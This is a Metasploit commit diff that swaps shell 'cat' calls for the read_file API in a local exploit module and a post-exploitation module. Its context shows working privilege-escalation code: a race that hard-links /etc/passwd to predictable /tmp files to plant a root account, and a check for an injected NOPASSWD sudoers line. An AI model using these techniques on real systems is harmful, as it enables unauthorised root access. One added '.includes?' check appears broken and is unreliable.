Land #7377, read_file for some modules
commit
bcb040c1ac
|
@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
def shemsham_installed?()
|
||||
# we want this to be false.
|
||||
vprint_status('Checking if shem or sham are installed')
|
||||
shemsham = cmd_exec('cat /proc/cpuinfo')
|
||||
shemsham = read_file('/proc/cpuinfo')
|
||||
if shemsham.include?('shem')
|
||||
print_error('shem installed, system not vulnerable.')
|
||||
elsif shemsham.include?('sham')
|
||||
|
|
|
@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
vprint_status("Now to check whether the script worked...")
|
||||
|
||||
# Check whether it worked
|
||||
crontab = cmd_exec("cat /etc/crontab")
|
||||
crontab = read_file("/etc/crontab")
|
||||
vprint_status("Reading crontab yielded the following response: #{crontab}")
|
||||
unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
|
||||
vprint_error("Bad news... it did not write to the file.")
|
||||
|
|
|
@ -63,7 +63,7 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
def run
|
||||
print_status "Setting up the victim's /tmp dir"
|
||||
initial_size = cmd_exec("cat /etc/passwd | wc -l")
|
||||
initial_size = read_file("/etc/passwd").lines.count
|
||||
print_status "/etc/passwd is currently #{initial_size} lines long"
|
||||
i = 0
|
||||
j = 0
|
||||
|
@ -75,7 +75,7 @@ class MetasploitModule < Msf::Post
|
|||
print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
|
||||
cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
|
||||
end
|
||||
current_size = cmd_exec("cat /etc/passwd | wc -l")
|
||||
current_size = read_file("/etc/passwd").lines.count
|
||||
if current_size == initial_size
|
||||
# PCAP is flowing
|
||||
pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
|
||||
|
@ -92,7 +92,7 @@ class MetasploitModule < Msf::Post
|
|||
i = (i+1) % 60 # increment second counter
|
||||
end
|
||||
|
||||
if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
|
||||
if read_file("/etc/passwd").includes?("Metasploit")
|
||||
print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
|
||||
# TODO: Consider recording our now-created username and password as a valid credential here.
|
||||
else
|
||||
|
|
Loading…
Reference in New Issue